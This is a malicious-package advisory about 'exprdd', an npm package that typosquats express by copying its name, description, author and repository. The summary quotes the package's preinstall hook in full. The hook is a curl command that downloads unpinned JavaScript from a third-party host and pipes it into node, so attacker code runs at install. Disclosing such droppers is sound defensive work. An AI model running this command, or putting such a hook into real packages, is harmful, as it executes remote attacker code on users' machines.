OSV ID
MAL-2026-17241
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle hook curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, which fetches an unpinned JavaScript payload from a third-party host (gitflic.ru, retrieved via web.archive.org) and pipes it directly into node. Running npm install exprdd therefore executes attacker-controlled code with the installer's privileges before any package code is reviewed or imported. The tarball reuses express's name-adjacent identifier, description ("Fast, unopinionated, minimalist web framework"), author, contributors, repository (expressjs/express), homepage, and dependency list, and ships express's index.js stub, disguising the dropper as the legitimate express package and increasing the chance of accidental installation via typo.
Source: amazon-inspector (d800570db124bde006fc1d078aefceef4e42acce755653f6d3c8282447a512a4)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.